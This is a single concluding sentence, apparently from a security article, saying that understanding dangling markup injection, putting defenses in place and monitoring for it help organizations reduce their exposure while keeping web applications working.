By understanding dangling markup injection deeply, implementing comprehensive defenses, and maintaining vigilant monitoring, organizations can significantly reduce their exposure to this subtle but dangerous attack vector while preserving the functionality users expect from modern web applications.
